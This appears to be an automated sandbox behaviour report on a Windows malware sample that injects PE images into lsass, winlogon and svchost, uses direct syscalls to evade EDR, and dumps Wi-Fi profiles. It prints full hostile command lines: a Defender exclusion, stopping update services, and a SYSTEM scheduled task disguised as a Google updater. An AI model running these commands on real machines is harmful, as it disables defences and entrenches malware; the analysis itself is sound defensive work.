Source: C:\Windows\System32\svchost.exe	Code function: 28_2_000001F027623218 SetUnhandledExceptionFilter,	28_2_000001F027623218
Source: C:\Windows\System32\svchost.exe	Code function: 28_2_000001F027617E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	28_2_000001F027617E70
Source: C:\Windows\System32\svchost.exe	Code function: 28_2_000001F02761B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	28_2_000001F02761B50C
Source: C:\Windows\System32\dwm.exe	Code function: 29_2_000002311E407E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	29_2_000002311E407E70
Source: C:\Windows\System32\dwm.exe	Code function: 29_2_000002311E413218 SetUnhandledExceptionFilter,	29_2_000002311E413218
Source: C:\Windows\System32\dwm.exe	Code function: 29_2_000002311E40B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	29_2_000002311E40B50C

Source: C:\Users\user\Desktop\zufmUwylvo.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force	Jump to behavior
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

Allocates memory in foreign processes

Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\winlogon.exe base: 1F6C8470000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\lsass.exe base: 261AC8D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1F0275E0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dwm.exe base: 2311E3D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1D5F7F50000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1AAC8AE0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 204BC7A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 27C4D790000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe base: 2A587ED0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files\Google\Chrome\updater.exe base: 80000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 27E55A50000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2092EC50000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 17BB1400000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1EB17B40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exe base: 296CFDF0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exe base: 15C97E00000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1AF4FEA0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1725BE60000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 21FBD0F0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2547E170000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 287AB6C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1FAFDF40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1AC1DE80000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 224FD600000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1B7BF240000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1D2CE700000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1C9BD560000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 28957E00000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 24DDA140000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2AFEC660000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 294A81A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\spoolsv.exe base: 12F0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2839C3A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1A7A8560000 protect: page execute and read and write

Contains functionality to inject code into remote processes

Source: C:\Windows\System32\dialer.exe

Code function: 19_2_00007FF744DD1DB4 CreateProcessW,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,OpenProcess,TerminateProcess,

19_2_00007FF744DD1DB4

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\winlogon.exe EIP: C8472908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\lsass.exe EIP: AC8D2908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 275E2908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\dwm.exe EIP: 1E3D2908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: F7F52908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: C8AE2908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: BC7A2908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 4D792908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Program Files\Google\Chrome\updater.exe EIP: 82908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe EIP: 87ED2908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 55A52908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 2EC52908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: B1402908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 17B42908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exe EIP: CFDF2908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exe EIP: 97E02908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 4FEA2908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 5BE62908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: BD0F2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 7E172908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: AB6C2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: FDF42908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 1DE82908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: FD602908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: BF242908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: CE702908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: BD562908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 57E02908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: DA142908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: EC662908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A81A2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 12F2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 9C3A2908

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe	NtProtectVirtualMemory: Direct from: 0x1412A1127	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	NtResumeThread: Indirect: 0x125D40124CA	Jump to behavior
Source: C:\Program Files\Google\Chrome\updater.exe	NtOpenFile: Direct from: 0x14100F204
Source: C:\Program Files\Google\Chrome\updater.exe	NtProtectVirtualMemory: Direct from: 0x1412C0ABC
Source: C:\Users\user\Desktop\zufmUwylvo.exe	NtEnumerateValueKey: Indirect: 0x125D4012AC1	Jump to behavior
Source: C:\Program Files\Google\Chrome\updater.exe	NtProtectVirtualMemory: Indirect: 0x140FFF996
Source: C:\Program Files\Google\Chrome\updater.exe	NtMapViewOfSection: Direct from: 0x141D27DE5
Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe	NtProtectVirtualMemory: Direct from: 0x1415D0BA0	Jump to behavior
Source: C:\Program Files\Google\Chrome\updater.exe	NtClose: Direct from: 0x1412B3B60
Source: C:\Program Files\Google\Chrome\updater.exe	NtProtectVirtualMemory: Direct from: 0x1415CE6E3
Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe	NtClose: Direct from: 0x141D12BBD
Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe	NtProtectVirtualMemory: Direct from: 0x141040B0A	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	NtDeviceIoControlFile: Indirect: 0x125D4012D4D	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe	NtProtectVirtualMemory: Direct from: 0x1412BD7F7	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	NtQuerySystemInformation: Indirect: 0x125D4013107	Jump to behavior
Source: C:\Program Files\Google\Chrome\updater.exe	NtProtectVirtualMemory: Direct from: 0x1415C2178
Source: C:\Program Files\Google\Chrome\updater.exe	NtAdjustPrivilegesToken: Direct from: 0x14000749E
Source: C:\Program Files\Google\Chrome\updater.exe	NtProtectVirtualMemory: Direct from: 0x1415D9790
Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe	NtMapViewOfSection: Direct from: 0x1412772D4	Jump to behavior
Source: C:\Program Files\Google\Chrome\updater.exe	NtProtectVirtualMemory: Direct from: 0x1412ADDC1
Source: C:\Program Files\Google\Chrome\updater.exe	NtProtectVirtualMemory: Direct from: 0x1412C601C
Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe	NtUnmapViewOfSection: Direct from: 0x1412CDCCE	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	NtQuerySystemInformation: Indirect: 0x125D40121FD	Jump to behavior
Source: C:\Program Files\Google\Chrome\updater.exe	NtProtectVirtualMemory: Direct from: 0x1412D1594
Source: C:\Users\user\Desktop\zufmUwylvo.exe	NtEnumerateValueKey: Indirect: 0x125D4012AF5	Jump to behavior
Source: C:\Program Files\Google\Chrome\updater.exe	NtUnmapViewOfSection: Direct from: 0x1412A583F
Source: C:\Program Files\Google\Chrome\updater.exe	NtProtectVirtualMemory: Direct from: 0x1415D841E
Source: C:\Program Files\Google\Chrome\updater.exe	NtProtectVirtualMemory: Direct from: 0x1412C21DB
Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe	NtOpenFile: Direct from: 0x14102A3E4	Jump to behavior
Source: C:\Program Files\Google\Chrome\updater.exe	NtProtectVirtualMemory: Direct from: 0x1415E28CB

Injects a PE file into a foreign processes

Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\winlogon.exe base: 1F6C8470000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\lsass.exe base: 261AC8D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F0275E0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dwm.exe base: 2311E3D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D5F7F50000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1AAC8AE0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 204BC7A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 27C4D790000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe base: 2A587ED0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Google\Chrome\updater.exe base: 80000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 27E55A50000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2092EC50000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17BB1400000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1EB17B40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exe base: 296CFDF0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exe base: 15C97E00000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1AF4FEA0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1725BE60000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21FBD0F0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2547E170000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 287AB6C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FAFDF40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1AC1DE80000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 224FD600000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B7BF240000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D2CE700000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C9BD560000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 28957E00000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 24DDA140000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AFEC660000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 294A81A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\spoolsv.exe base: 12F0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2839C3A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A7A8560000 value starts with: 4D5A

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe	Section loaded: NULL target: C:\Windows\System32\dialer.exe protection: readonly	Jump to behavior
Source: C:\Program Files\Google\Chrome\updater.exe	Section loaded: NULL target: unknown protection: readonly
Source: C:\Program Files\Google\Chrome\updater.exe	Section loaded: NULL target: unknown protection: readonly
Source: C:\Program Files\Google\Chrome\updater.exe	Section loaded: NULL target: unknown protection: readonly

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe	Thread register set: target process: 8464	Jump to behavior
Source: C:\Program Files\Google\Chrome\updater.exe	Thread register set: target process: 8788
Source: C:\Program Files\Google\Chrome\updater.exe	Thread register set: target process: 5936
Source: C:\Program Files\Google\Chrome\updater.exe	Thread register set: target process: 8556

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe	Memory written: C:\Windows\System32\dialer.exe base: 48C3098010	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\winlogon.exe base: 1F6C8470000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\lsass.exe base: 261AC8D0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F0275E0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dwm.exe base: 2311E3D0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D5F7F50000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1AAC8AE0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 204BC7A0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 27C4D790000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe base: 2A587ED0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Google\Chrome\updater.exe base: 80000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 27E55A50000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2092EC50000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17BB1400000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1EB17B40000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exe base: 296CFDF0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exe base: 15C97E00000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1AF4FEA0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1725BE60000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21FBD0F0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2547E170000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 287AB6C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FAFDF40000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1AC1DE80000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 224FD600000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B7BF240000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D2CE700000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C9BD560000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 28957E00000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 24DDA140000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AFEC660000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 294A81A0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\spoolsv.exe base: 12F0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2839C3A0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A7A8560000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: C385F7C690
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A7A7D70000
Source: C:\Program Files\Google\Chrome\updater.exe	Memory written: C:\Windows\System32\dialer.exe base: 94F53EB010
Source: C:\Program Files\Google\Chrome\updater.exe	Memory written: C:\Windows\System32\dialer.exe base: 6BF8C55010
Source: C:\Program Files\Google\Chrome\updater.exe	Memory written: C:\Windows\System32\dialer.exe base: 9C039E9010

Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process created: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe "C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe"	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process created: C:\Windows\System32\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles \| findstr All	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr All	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Google\Chrome\updater.exe "C:\Program Files\Google\Chrome\updater.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#irktvxcx#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'googleupdatetaskmachineqc' /tr '''c:\program files\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -user 'system' -runlevel 'highest' -force; }
Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#irktvxcx#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'googleupdatetaskmachineqc' /tr '''c:\program files\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -user 'system' -runlevel 'highest' -force; }			Jump to behavior

Source: C:\Windows\System32\dialer.exe

Code function: 19_2_00007FF744DD1C64 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

19_2_00007FF744DD1C64

Source: C:\Windows\System32\dialer.exe

Code function: 19_2_00007FF744DD1C64 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

19_2_00007FF744DD1C64

Source: zufmUwylvo.exe, 00000000.00000002.11842414529.00000125BAE8B000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11842414529.00000125BAEBD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: zufmUwylvo.exe, 00000000.00000002.11842414529.00000125BAE8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ACTIVE WINDOW: Program Manager2\
Source: zufmUwylvo.exe, 00000000.00000002.11842414529.00000125BAE8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ACTIVE WINDOW: Program Managerp^\
